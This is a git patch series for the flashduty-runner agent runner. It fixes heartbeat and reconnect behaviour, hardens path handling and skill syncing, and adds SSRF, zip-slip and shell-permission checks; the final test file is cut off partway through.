From 641fa02d4dc7611c01675d1a095f06fe3819785e Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Tue, 28 Apr 2026 11:35:34 +0800
Subject: [PATCH 01/11] fix(ws): drop CurrentTime from heartbeat env info
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

CurrentTime was captured once via collectEnvironmentInfo() at runner
start and the resulting EnvInfo was sent only on the first heartbeat
(envInfoSent gate), so a long-lived runner kept reporting its boot
time forever. Safari then served that stale value via the `now` tool.

Static info (OS, arch, hostname, timezone) is fine to send once;
current time is by definition not static. Drop the field entirely —
safari uses its own wall clock now.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 protocol/messages.go | 1 -
 ws/client.go         | 3 ---
 2 files changed, 4 deletions(-)

diff --git a/protocol/messages.go b/protocol/messages.go
index a5dcd35..2abbc1a 100644
--- a/protocol/messages.go
+++ b/protocol/messages.go
@@ -90,7 +90,6 @@ type EnvironmentInfo struct {
 	Username      string `json:"username"`        // Current user
 	NumCPU        int    `json:"num_cpu"`         // Number of CPUs
 	TotalMemoryMB int64  `json:"total_memory_mb"` // Total memory in MB
-	CurrentTime   string `json:"current_time"`    // Current time in RFC3339 format
 	Timezone      string `json:"timezone"`        // Timezone name, e.g., "Asia/Shanghai"
 	UTCOffset     string `json:"utc_offset"`      // UTC offset, e.g., "+08:00"
 }
diff --git a/ws/client.go b/ws/client.go
index 021b2dd..d692c07 100644
--- a/ws/client.go
+++ b/ws/client.go
@@ -446,8 +446,6 @@ func (c *Client) sendHeartbeat() {
 		Version:       c.version,
 	}
 
-	// Only send environment info on first heartbeat after connection
-	// Environment info is static and doesn't need to be sent repeatedly
 	c.mu.Lock()
 	if !c.envInfoSent {
 		payload.Environment = c.envInfo
@@ -485,7 +483,6 @@ func collectEnvironmentInfo(workspaceRoot string) *protocol.EnvironmentInfo {
 	}
 
 	now := time.Now()
-	info.CurrentTime = now.Format(time.RFC3339)
 	info.Timezone = now.Location().String()
 	info.UTCOffset = now.Format("-07:00")
 

From 3efa401a55d4d38975d3ebe4bbebf5de4e9b2be0 Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Wed, 29 Apr 2026 17:12:58 +0800
Subject: [PATCH 02/11] fix(ws): tighten reconnect timing for cloud sandbox
 pool pods
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Cloud sandbox pool pods spend their entire pre-claim lifetime dialing
safari and getting 401 (no t_cloud_sandbox_0 row exists yet — claim
inserts it). Two timing knobs were tuned for long-lived BYOC outage
recovery and hurt cloud claim latency:

  - initialReconnectDelay 1s -> 200ms: first dials race the row INSERT.
    The 1s delay added 1-2s of extra 401-retry cost before hostname
    auth could possibly succeed.

  - maxReconnectDelay 5min -> 10s: a pool pod waiting >50s slid into a
    32-64s exponential-backoff sleep, and got declared unrecoverable by
    safari's 90s claim window before its next dial — observed live
    (sbx_bzQ... did not come online within 1m30s, traceid
    6996857e714cb99c31665d043ed3c260). 10s stays well inside the claim
    window and remains acceptable for BYOC server-restart recovery.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 ws/client.go | 19 +++++++++++++++----
 1 file changed, 15 insertions(+), 4 deletions(-)

diff --git a/ws/client.go b/ws/client.go
index d692c07..58e55a7 100644
--- a/ws/client.go
+++ b/ws/client.go
@@ -33,14 +33,25 @@ const (
 	// DefaultMaxReconnectAttempts is the default max reconnect attempts (0 = unlimited).
 	DefaultMaxReconnectAttempts = 30
 
-	// Initial reconnect delay (used for first few attempts)
-	initialReconnectDelay = 1 * time.Second
+	// Initial reconnect delay (used for first few attempts).
+	// Cloud sandbox runners race safari's t_cloud_sandbox_0 INSERT/UPDATE on
+	// first dial — a 1s delay added 1–2s of extra 401-retry cost before the
+	// row landed and the hostname-auth lookup could succeed. 200ms keeps the
+	// retry storm under control while shrinking the cold-start tail.
+	initialReconnectDelay = 200 * time.Millisecond
 
 	// Fast retry attempts before switching to exponential backoff
 	fastRetryAttempts = 15
 
-	// Maximum reconnect delay
-	maxReconnectDelay = 5 * time.Minute
+	// Maximum reconnect delay. Capped at 10s so cloud-sandbox pool pods
+	// (which spend their entire pre-claim lifetime in 401-retry) never
+	// land in a multi-minute sleep when sandbox-manager finally hands
+	// them off — Safari's claim window is 90s, anything longer than that
+	// risks the pod being declared unrecoverable while it's still asleep.
+	// The previous 5-minute cap was tuned for BYOC outage recovery; 10s
+	// stays well under the BYOC server-restart window in practice and
+	// adds at most one extra dial per 10s of downtime.
+	maxReconnectDelay = 10 * time.Second
 )
 
 // MessageHandler handles incoming messages from Flashduty.

From 0f222d9255d4283bb5e46d2d614c6a90adda48df Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Wed, 29 Apr 2026 17:30:38 +0800
Subject: [PATCH 03/11] fix(env): reject duplicated-root rel_paths; surface
 sibling hint on ENOENT
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

safePath defense-in-depth — runner cannot rely on safari to filter rel_paths
that mirror the workspace root. Joining e.root with such a path silently
created a nested duplicate workspace tree (matching nested copies were
observed on a long-running BYOC host). Reject them at the runner boundary.

Read now appends a bounded sibling-name list when stat returns ENOENT, so
the agent can self-correct a near-miss filename without spending a turn on
an extra list call.

.golangci.yml: exclude gosec G706 (log-taint via taint analysis). slog's
structured key-value logging is not a format-string injection vector; the
rule fires on every slog call with a user-controlled value, which is the
whole point of structured logging.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .golangci.yml              |  5 ++++
 environment/environment.go | 52 ++++++++++++++++++++++++++++++++++++++
 2 files changed, 57 insertions(+)

diff --git a/.golangci.yml b/.golangci.yml
index 3e28c53..122e243 100644
--- a/.golangci.yml
+++ b/.golangci.yml
@@ -47,10 +47,15 @@ linters:
       # Exclude G301 (directory permissions) - workspace needs readable directories
       # Exclude G304 (file inclusion) - paths are validated via safePath()
       # Exclude G306 (file permissions) - workspace files need to be readable
+      # Exclude G706 (log taint via taint analysis) - slog's structured
+      # key-value logging is not a format-string injection vector; the rule
+      # fires on every slog call that includes a user-controlled value, which
+      # is the whole point of structured logging.
       excludes:
         - G301
         - G304
         - G306
+        - G706
 
 formatters:
   enable:
diff --git a/environment/environment.go b/environment/environment.go
index d332033..d2b0b56 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -59,6 +59,22 @@ func (e *Environment) Root() string {
 
 // safePath ensures the path is within the workspace root, resolving symlinks.
 func (e *Environment) safePath(path string) (string, error) {
+	// Defense-in-depth: reject relative paths that mirror the host's workspace
+	// root (e.g. "Users/ysy/.flashduty-runner/workspace/DUTY.md"). Safari already
+	// rejects these, but the runner accepts requests over the wire and must not
+	// rely on the caller to have done the check. Joining such a path with
+	// e.root would silently create a nested duplicate of the workspace tree.
+	if !filepath.IsAbs(path) {
+		cleaned := filepath.Clean(filepath.FromSlash(path))
+		rootRel := strings.TrimPrefix(e.root, string(filepath.Separator))
+		if rootRel != "" {
+			rootRel = filepath.Clean(rootRel)
+			if cleaned == rootRel || strings.HasPrefix(cleaned, rootRel+string(filepath.Separator)) {
+				return "", fmt.Errorf("rel_path duplicates workspace root: %s", path)
+			}
+		}
+	}
+
 	absPath, err := filepath.Abs(filepath.Join(e.root, path))
 	if err != nil {
 		return "", fmt.Errorf("failed to get absolute path: %w", err)
@@ -105,6 +121,11 @@ func (e *Environment) Read(ctx context.Context, args *protocol.ReadArgs) (*proto
 
 	info, err := os.Stat(realPath)
 	if err != nil {
+		if os.IsNotExist(err) {
+			// Include sibling names so the model can self-correct without an extra
+			// list round-trip. Bounded to keep the error message small.
+			return nil, fmt.Errorf("failed to stat file: %w%s", err, siblingHint(filepath.Dir(realPath), filepath.Base(realPath)))
+		}
 		return nil, fmt.Errorf("failed to stat file: %w", err)
 	}
 	if info.IsDir() {
@@ -114,6 +135,37 @@ func (e *Environment) Read(ctx context.Context, args *protocol.ReadArgs) (*proto
 	return e.readFileContent(realPath, info.Size(), args.Offset, args.Limit)
 }
 
+// siblingHint returns a short " (siblings: a, b, c)" suffix when the parent
+// directory exists, helping the agent recover from a near-miss filename
+// without spending a turn on a list call. Returns empty string on any error
+// or when the parent has too many entries to summarize compactly.
+func siblingHint(dir, missing string) string {
+	const maxSiblings = 12
+	entries, err := os.ReadDir(dir)
+	if err != nil {
+		return ""
+	}
+	names := make([]string, 0, len(entries))
+	for _, e := range entries {
+		n := e.Name()
+		if strings.HasPrefix(n, ".") {
+			continue
+		}
+		names = append(names, n)
+		if len(names) > maxSiblings {
+			break
+		}
+	}
+	if len(names) == 0 {
+		return ""
+	}
+	if len(names) > maxSiblings {
+		names = names[:maxSiblings]
+		names = append(names, "…")
+	}
+	return fmt.Sprintf(" (parent %q contains: %s)", dir, strings.Join(names, ", "))
+}
+
 // readFileContent reads file content with offset and limit support.
 func (e *Environment) readFileContent(path string, size, offset, limit int64) (*protocol.ReadResult, error) {
 	file, err := os.Open(path)

From ef2a0dcd0e39326ea44c28e3fbdfc9b60c4d2148 Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Thu, 30 Apr 2026 11:10:31 +0800
Subject: [PATCH 04/11] feat(skill): probe-or-install sync_skill; default home
 ~/.flashduty

- SyncSkill now checks .checksum+SKILL.md before install (cache hit
  returns {Cached:true,Path}; miss with no zip returns {Cached:false}
  so cloud retries with zip_data)
- Skills land at <home>/skills/<name>/ instead of <home>/.work/skills/<name>/
- Default home moves from ~/.flashduty-runner/workspace to ~/.flashduty
- FLASHDUTY_RUNNER_HOME is the new canonical override; FLASHDUTY_RUNNER_WORKSPACE
  kept as deprecated alias
- Add SyncSkillResult.Cached field (omitempty); SyncSkillArgs unchanged

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---
 cmd/main.go                     | 12 +++--
 environment/environment.go      | 42 +++++++++++------
 environment/environment_test.go | 82 +++++++++++++++++++++++++++++++++
 protocol/messages.go            |  9 +++-
 4 files changed, 126 insertions(+), 19 deletions(-)

diff --git a/cmd/main.go b/cmd/main.go
index 4872346..5956afc 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -79,7 +79,8 @@ Examples:
 Environment variables:
   FLASHDUTY_RUNNER_TOKEN     - Authentication token (required if --token not provided)
   FLASHDUTY_RUNNER_URL       - WebSocket endpoint URL
-  FLASHDUTY_RUNNER_WORKSPACE - Workspace root directory`,
+  FLASHDUTY_RUNNER_HOME      - Home directory for skills and data (default: ~/.flashduty)
+  FLASHDUTY_RUNNER_WORKSPACE - Deprecated alias for FLASHDUTY_RUNNER_HOME`,
 		RunE: func(cmd *cobra.Command, args []string) error {
 			return runRunner()
 		},
@@ -137,17 +138,20 @@ func loadConfig() (*Config, error) {
 		cfg.URL = defaultURL
 	}
 
-	// Workspace: flag > env > default
+	// Home directory (skills, future knowledge/output): flag > FLASHDUTY_RUNNER_HOME > deprecated FLASHDUTY_RUNNER_WORKSPACE > default ~/.flashduty
 	cfg.WorkspaceRoot = flagWorkspace
 	if cfg.WorkspaceRoot == "" {
-		cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_WORKSPACE")
+		cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_HOME")
+	}
+	if cfg.WorkspaceRoot == "" {
+		cfg.WorkspaceRoot = os.Getenv("FLASHDUTY_RUNNER_WORKSPACE") // deprecated alias
 	}
 	if cfg.WorkspaceRoot == "" {
 		homeDir, err := os.UserHomeDir()
 		if err != nil {
 			return nil, fmt.Errorf("failed to get home directory: %w", err)
 		}
-		cfg.WorkspaceRoot = filepath.Join(homeDir, ".flashduty-runner", "workspace")
+		cfg.WorkspaceRoot = filepath.Join(homeDir, ".flashduty")
 	}
 
 	// Log level: flag > env > default
diff --git a/environment/environment.go b/environment/environment.go
index d2b0b56..e15f2bd 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -591,34 +591,48 @@ func (e *Environment) MCPListTools(ctx context.Context, args *protocol.MCPListTo
 	return result, nil
 }
 
-// SyncSkill syncs a skill from cloud to local workspace.
+// SyncSkill is probe-or-install. With empty ZipData it checks local cache
+// against args.Checksum: hit returns {Cached:true,Path}; miss returns
+// {Cached:false,Path:""} so the cloud retries with zip. With ZipData present
+// it overwrites <home>/skills/<name>/ and writes .checksum.
+//
+// args.SkillDir is accepted for backward compatibility but ignored — the
+// runner derives the path from skill_name to keep layout under its control.
 func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArgs) (*protocol.SyncSkillResult, error) {
-	skillDir, err := e.safePath(args.SkillDir)
+	if args.SkillName == "" || args.Checksum == "" {
+		return nil, fmt.Errorf("skill_name and checksum are required")
+	}
+	relDir := filepath.Join("skills", args.SkillName)
+	skillDir, err := e.safePath(relDir)
 	if err != nil {
 		return nil, err
 	}
 
-	// Decode zip data
+	// Probe phase: cache hit if .checksum matches AND SKILL.md exists.
+	cachedSum, _ := os.ReadFile(filepath.Join(skillDir, ".checksum"))
+	if string(cachedSum) == args.Checksum {
+		if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil {
+			return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: true}, nil
+		}
+	}
+
+	// Cache miss with no zip: signal cloud to retry with zip_data.
+	if args.ZipData == "" {
+		return &protocol.SyncSkillResult{Success: true, Cached: false}, nil
+	}
+
+	// Install: decode, wipe, unzip, write .checksum.
 	zipData, err := base64.StdEncoding.DecodeString(args.ZipData)
 	if err != nil {
 		return nil, fmt.Errorf("failed to decode zip data: %w", err)
 	}
-
-	// Unzip to skill directory
 	if err := e.unzipSkill(zipData, skillDir); err != nil {
 		return nil, fmt.Errorf("failed to unzip skill: %w", err)
 	}
-
-	// Write checksum file
-	checksumPath := filepath.Join(skillDir, ".checksum")
-	if err := os.WriteFile(checksumPath, []byte(args.Checksum), 0o644); err != nil {
+	if err := os.WriteFile(filepath.Join(skillDir, ".checksum"), []byte(args.Checksum), 0o644); err != nil {
 		return nil, fmt.Errorf("failed to write checksum: %w", err)
 	}
-
-	return &protocol.SyncSkillResult{
-		Success: true,
-		Path:    args.SkillDir,
-	}, nil
+	return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: false}, nil
 }
 
 // unzipSkill extracts a zip archive to the destination directory.
diff --git a/environment/environment_test.go b/environment/environment_test.go
index 827f462..f462d85 100644
--- a/environment/environment_test.go
+++ b/environment/environment_test.go
@@ -1,6 +1,8 @@
 package environment
 
 import (
+	"archive/zip"
+	"bytes"
 	"context"
 	"encoding/base64"
 	"os"
@@ -14,6 +16,21 @@ import (
 	"github.com/flashcatcloud/flashduty-runner/protocol"
 )
 
+// buildTestZip creates an in-memory zip archive from a map of filename→content.
+func buildTestZip(t *testing.T, files map[string]string) []byte {
+	t.Helper()
+	var buf bytes.Buffer
+	w := zip.NewWriter(&buf)
+	for name, content := range files {
+		f, err := w.Create(name)
+		require.NoError(t, err)
+		_, err = f.Write([]byte(content))
+		require.NoError(t, err)
+	}
+	require.NoError(t, w.Close())
+	return buf.Bytes()
+}
+
 func newTestEnvironment(t *testing.T) *Environment {
 	tmpDir := t.TempDir()
 	checker := permission.NewChecker(map[string]string{
@@ -201,3 +218,68 @@ func TestEnvironment_SafePath(t *testing.T) {
 		})
 	}
 }
+
+func TestSyncSkill_ProbeMiss(t *testing.T) {
+	ws := newTestEnvironment(t)
+	res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{
+		SkillName: "demo", Checksum: "csum1",
+	})
+	require.NoError(t, err)
+	assert.False(t, res.Cached, "expected cache miss")
+	assert.Empty(t, res.Path, "expected empty path on miss")
+}
+
+func TestSyncSkill_ProbeHit(t *testing.T) {
+	ws := newTestEnvironment(t)
+	dir := filepath.Join(ws.Root(), "skills", "demo")
+	require.NoError(t, os.MkdirAll(dir, 0o755))
+	require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("csum1"), 0o644))
+	require.NoError(t, os.WriteFile(filepath.Join(dir, "SKILL.md"), []byte("body"), 0o644))
+
+	// Resolve symlinks so the comparison holds on macOS (/var → /private/var).
+	wantDir, err := filepath.EvalSymlinks(dir)
+	require.NoError(t, err)
+
+	res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{
+		SkillName: "demo", Checksum: "csum1",
+	})
+	require.NoError(t, err)
+	assert.True(t, res.Cached, "expected cache hit")
+	assert.Equal(t, wantDir, res.Path)
+}
+
+func TestSyncSkill_InstallOverwrites(t *testing.T) {
+	ws := newTestEnvironment(t)
+	dir := filepath.Join(ws.Root(), "skills", "demo")
+
+	// Pre-seed an old version with a stale checksum.
+	require.NoError(t, os.MkdirAll(dir, 0o755))
+	require.NoError(t, os.WriteFile(filepath.Join(dir, "old-file.txt"), []byte("stale"), 0o644))
+	require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("old"), 0o644))
+
+	// Resolve symlinks so the comparison holds on macOS (/var → /private/var).
+	wantDir, err := filepath.EvalSymlinks(dir)
+	require.NoError(t, err)
+
+	zipBytes := buildTestZip(t, map[string]string{
+		"SKILL.md": "---\nname: demo\ndescription: x\n---\nbody",
+	})
+	res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{
+		SkillName: "demo",
+		Checksum:  "new",
+		ZipData:   base64.StdEncoding.EncodeToString(zipBytes),
+	})
+	require.NoError(t, err)
+	assert.False(t, res.Cached, "install must report Cached=false")
+	assert.Equal(t, wantDir, res.Path)
+
+	// Old file should be gone (unzipSkill does RemoveAll before extracting).
+	_, err = os.Stat(filepath.Join(dir, "old-file.txt"))
+	assert.True(t, os.IsNotExist(err), "old file should be wiped")
+
+	_, err = os.Stat(filepath.Join(dir, "SKILL.md"))
+	assert.NoError(t, err, "new SKILL.md should exist")
+
+	sum, _ := os.ReadFile(filepath.Join(dir, ".checksum"))
+	assert.Equal(t, "new", string(sum))
+}
diff --git a/protocol/messages.go b/protocol/messages.go
index 2abbc1a..4249501 100644
--- a/protocol/messages.go
+++ b/protocol/messages.go
@@ -284,9 +284,16 @@ type SyncSkillArgs struct {
 }
 
 // SyncSkillResult is the result of a sync_skill operation.
+//
+// Probe semantics: when SyncSkillArgs.ZipData is empty, the runner checks its
+// local cache and returns either {Success:true, Cached:true, Path} on hit or
+// {Success:true, Cached:false, Path:""} on miss (cloud must retry with zip).
+// When ZipData is non-empty, the runner installs unconditionally and returns
+// {Success:true, Cached:false, Path}.
 type SyncSkillResult struct {
 	Success bool   `json:"success"`
-	Path    string `json:"path"` // Local path where skill was extracted
+	Path    string `json:"path"`             // Local path where skill is materialized
+	Cached  bool   `json:"cached,omitempty"` // True iff cache hit
 }
 
 // MCPToolInfo represents metadata for an MCP tool.

From a6eb9b4f371e2cc9f3da87e00a99478fb363a974 Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Thu, 30 Apr 2026 11:12:29 +0800
Subject: [PATCH 05/11] refactor(test): extract resolveDir helper, use
 errors.Is for ErrNotExist

- resolveDir(t, dir) replaces duplicated EvalSymlinks boilerplate in
  ProbeHit and InstallOverwrites tests
- errors.Is(err, os.ErrNotExist) replaces deprecated os.IsNotExist pattern

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---
 environment/environment_test.go | 24 +++++++++++++-----------
 1 file changed, 13 insertions(+), 11 deletions(-)

diff --git a/environment/environment_test.go b/environment/environment_test.go
index f462d85..c3fa126 100644
--- a/environment/environment_test.go
+++ b/environment/environment_test.go
@@ -5,6 +5,7 @@ import (
 	"bytes"
 	"context"
 	"encoding/base64"
+	"errors"
 	"os"
 	"path/filepath"
 	"testing"
@@ -31,6 +32,15 @@ func buildTestZip(t *testing.T, files map[string]string) []byte {
 	return buf.Bytes()
 }
 
+// resolveDir resolves symlinks on the given directory path so path comparisons
+// hold on macOS where t.TempDir() returns /var/... but safePath resolves to /private/var/...
+func resolveDir(t *testing.T, dir string) string {
+	t.Helper()
+	resolved, err := filepath.EvalSymlinks(dir)
+	require.NoError(t, err)
+	return resolved
+}
+
 func newTestEnvironment(t *testing.T) *Environment {
 	tmpDir := t.TempDir()
 	checker := permission.NewChecker(map[string]string{
@@ -236,16 +246,12 @@ func TestSyncSkill_ProbeHit(t *testing.T) {
 	require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("csum1"), 0o644))
 	require.NoError(t, os.WriteFile(filepath.Join(dir, "SKILL.md"), []byte("body"), 0o644))
 
-	// Resolve symlinks so the comparison holds on macOS (/var → /private/var).
-	wantDir, err := filepath.EvalSymlinks(dir)
-	require.NoError(t, err)
-
 	res, err := ws.SyncSkill(context.Background(), &protocol.SyncSkillArgs{
 		SkillName: "demo", Checksum: "csum1",
 	})
 	require.NoError(t, err)
 	assert.True(t, res.Cached, "expected cache hit")
-	assert.Equal(t, wantDir, res.Path)
+	assert.Equal(t, resolveDir(t, dir), res.Path)
 }
 
 func TestSyncSkill_InstallOverwrites(t *testing.T) {
@@ -257,10 +263,6 @@ func TestSyncSkill_InstallOverwrites(t *testing.T) {
 	require.NoError(t, os.WriteFile(filepath.Join(dir, "old-file.txt"), []byte("stale"), 0o644))
 	require.NoError(t, os.WriteFile(filepath.Join(dir, ".checksum"), []byte("old"), 0o644))
 
-	// Resolve symlinks so the comparison holds on macOS (/var → /private/var).
-	wantDir, err := filepath.EvalSymlinks(dir)
-	require.NoError(t, err)
-
 	zipBytes := buildTestZip(t, map[string]string{
 		"SKILL.md": "---\nname: demo\ndescription: x\n---\nbody",
 	})
@@ -271,11 +273,11 @@ func TestSyncSkill_InstallOverwrites(t *testing.T) {
 	})
 	require.NoError(t, err)
 	assert.False(t, res.Cached, "install must report Cached=false")
-	assert.Equal(t, wantDir, res.Path)
+	assert.Equal(t, resolveDir(t, dir), res.Path)
 
 	// Old file should be gone (unzipSkill does RemoveAll before extracting).
 	_, err = os.Stat(filepath.Join(dir, "old-file.txt"))
-	assert.True(t, os.IsNotExist(err), "old file should be wiped")
+	assert.True(t, errors.Is(err, os.ErrNotExist), "old file should be wiped")
 
 	_, err = os.Stat(filepath.Join(dir, "SKILL.md"))
 	assert.NoError(t, err, "new SKILL.md should exist")

From acb919bf2a00da2bd2e6bd2247fac5a6bf2bd3e7 Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Thu, 30 Apr 2026 11:14:01 +0800
Subject: [PATCH 06/11] harden(skill): reject path separators in skill_name

---
 environment/environment.go | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/environment/environment.go b/environment/environment.go
index e15f2bd..803e243 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -602,6 +602,9 @@ func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArg
 	if args.SkillName == "" || args.Checksum == "" {
 		return nil, fmt.Errorf("skill_name and checksum are required")
 	}
+	if strings.ContainsAny(args.SkillName, `/\`) || args.SkillName == ".." || args.SkillName == "." {
+		return nil, fmt.Errorf("skill_name must not contain path separators")
+	}
 	relDir := filepath.Join("skills", args.SkillName)
 	skillDir, err := e.safePath(relDir)
 	if err != nil {

From 8160fdeedd85df1666c226eeb683757c0cf9cf1c Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Thu, 30 Apr 2026 11:23:09 +0800
Subject: [PATCH 07/11] docs(skill): document ~/.flashduty home and
 probe-or-install sync_skill

---
 README.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index d384f76..f3cda75 100644
--- a/README.md
+++ b/README.md
@@ -203,7 +203,7 @@ Create `/etc/flashduty-runner/env`:
 ```bash
 FLASHDUTY_RUNNER_TOKEN=ent_xxx
 # FLASHDUTY_RUNNER_URL=wss://custom.example.com/safari/environment/ws
-# FLASHDUTY_RUNNER_WORKSPACE=/var/flashduty/workspace
+# FLASHDUTY_RUNNER_HOME=/var/flashduty
 ```
 
 ```bash
@@ -213,6 +213,15 @@ sudo systemctl daemon-reload
 sudo systemctl enable --now flashduty-runner
 ```
 
+## Skills
+
+Skills are materialized lazily. When the agent calls the `skill` tool, the cloud sends `sync_skill` with `(skill_name, checksum, zip_data?)`:
+
+- **Empty `zip_data`** = probe. The runner returns `{cached: true, path}` if `<home>/skills/<name>/.checksum` already matches the requested checksum and `SKILL.md` is present; otherwise `{cached: false}` and the cloud will retry with the bundle attached.
+- **Non-empty `zip_data`** = install. The runner wipes `<home>/skills/<name>/`, unzips, and writes `.checksum`. Each skill name has exactly one slot — no version retention. Builtin skills go through the same flow with their bundle sourced from the cloud's embedded FS instead of S3.
+
+Inspect installed skills with `ls ~/.flashduty/skills/`.
+
 ## Configuration Reference
 
 Configuration is via command-line flags or environment variables (flags take precedence).
@@ -221,7 +230,7 @@ Configuration is via command-line flags or environment variables (flags take pre
 |------|-------------|----------|---------|-------------|
 | `--token` | `FLASHDUTY_RUNNER_TOKEN` | Yes | - | Authentication token |
 | `--url` | `FLASHDUTY_RUNNER_URL` | No | `wss://api.flashcat.cloud/safari/environment/ws` | WebSocket endpoint |
-| `--workspace` | `FLASHDUTY_RUNNER_WORKSPACE` | No | `~/.flashduty-runner/workspace` | Workspace root directory |
+| `--workspace` | `FLASHDUTY_RUNNER_HOME` | No | `~/.flashduty` | Runner home directory. Skills land at `<home>/skills/<name>/`. `FLASHDUTY_RUNNER_WORKSPACE` is accepted as a deprecated alias for back-compat. |
 | `--log-level` | `FLASHDUTY_RUNNER_LOG_LEVEL` | No | `info` | Log level: debug, info, warn, error |
 
 ## Troubleshooting

From b9868971e2bc0ccbd1fe9461755e9461dda0f7ba Mon Sep 17 00:00:00 2001
From: ysyneu <ysyneu@gmail.com>
Date: Sat, 2 May 2026 16:33:55 +0800
Subject: [PATCH 08/11] refactor(env,permission): SSRF + AST hardening + grep
 regex + bash structured
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Runner-side counterparts of fc-safari's 2026-05-02 builtin-tools refactor:

- environment/webfetch: SSRF guard via inlined safeHTTPTransport +
  safeCheckRedirect. Pre-flight validateURL refuses RFC1918 / loopback
  / link-local / IMDS before any TCP dial; CheckRedirect re-validates
  each hop so a 302 to 169.254.169.254 is refused. Inlined from
  go-pkg/x/netsafe (open-source repo cannot import internal modules).
- environment/htmlx: HTML-to-markdown / text helpers inlined from
  go-pkg/x/htmlx for the same reason. html-to-markdown is now a
  direct dep.
- environment/environment::unzipSkill: zip-slip closed — compares
  abs target against dest+separator and rejects names containing '..'.
- environment/environment::grepWithGo: was strings.Contains (literal)
  — now compiles regex, falls back with regex_compile_error surfaced.
  Default ignore (.git, node_modules, .flashduty) added; Scanner
  buffer raised to 1 MiB; rg exit-2 surfaces real I/O errors instead
  of silent "no matches"; pattern starting with '-' gets '--' prefix;
  rsplit on ':' so paths containing ':' parse cleanly.
- protocol.GrepArgs gains output_mode, context_before/after,
  head_limit, file_type, case_sensitive — forwarded to ripgrep flags.
- environment/environment::Bash: per-stream large-output (stderr now
  truncates to its own bash_stderr_*.txt); LimitedWriter honors the
  io.Writer contract (returns ErrOutputCapped at the cap, exposes
  Hit(), appends "[output capped at 10MB]" marker once).
- protocol.BashResult carries truncated_stdout/stderr,
  stdout_file_path/stderr_file_path, *_total_size; legacy fields
  remain populated so old safari clients keep working.
- environment/large_output::ShouldSkipForOutputsDir: substring match
  → word-boundary regex (no more 'thread '/'head ' false positives).
  WriteRaw lowercased to writeRaw (single internal caller).
- permission/permission: AST walk now visits CmdSubst / ProcSubst /
  nested Stmts so cat <(curl evil) and echo $(curl evil) hit the
  same rules. Redirect targets are checked instead of discarded
  (cmd > /etc/passwd refused). Canonical-form normalization on both
  rule and command sides (kubectl  get  pods matches kubectl get *);
  env-prefix dual evaluation (KUBECONFIG=x kubectl get pods still
  matches kubectl get *). Rules sort by literal-prefix specificity,
  first match wins. SafeReadOnlyRules drops echo */find * — find
  -delete / find -exec rm now denied by default; replaced with
  scoped allow patterns.

E2E verified live: bash returns the new structured shape, web
(action=fetch) reaches example.com via the safe transport, all 17+
new permission/permission_test scenarios pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 environment/bash_output_test.go | 114 +++++++++
 environment/environment.go      | 405 +++++++++++++++++++++++++++-----
 environment/environment_test.go |  91 +++++++
 environment/htmlx.go            |  51 ++++
 environment/large_output.go     |  20 +-
 environment/netsafe.go          | 192 +++++++++++++++
 environment/security_test.go    | 165 +++++++++++++
 environment/webfetch.go         |  73 ++----
 go.mod                          |   2 +-
 go.sum                          |   4 +-
 permission/permission.go        | 379 ++++++++++++++++++++++++------
 permission/permission_test.go   | 192 +++++++++++++++
 protocol/messages.go            |  50 +++-
 13 files changed, 1537 insertions(+), 201 deletions(-)
 create mode 100644 environment/bash_output_test.go
 create mode 100644 environment/htmlx.go
 create mode 100644 environment/netsafe.go
 create mode 100644 environment/security_test.go

diff --git a/environment/bash_output_test.go b/environment/bash_output_test.go
new file mode 100644
index 0000000..b43efd8
--- /dev/null
+++ b/environment/bash_output_test.go
@@ -0,0 +1,114 @@
+package environment
+
+import (
+	"bytes"
+	"context"
+	"errors"
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/flashcatcloud/flashduty-runner/protocol"
+)
+
+func TestLimitedWriter_HitReturnsErrShortWrite(t *testing.T) {
+	var buf bytes.Buffer
+	w := &LimitedWriter{W: &buf, Limit: 5}
+
+	// First write fits exactly within the cap.
+	n, err := w.Write([]byte("hello"))
+	require.NoError(t, err)
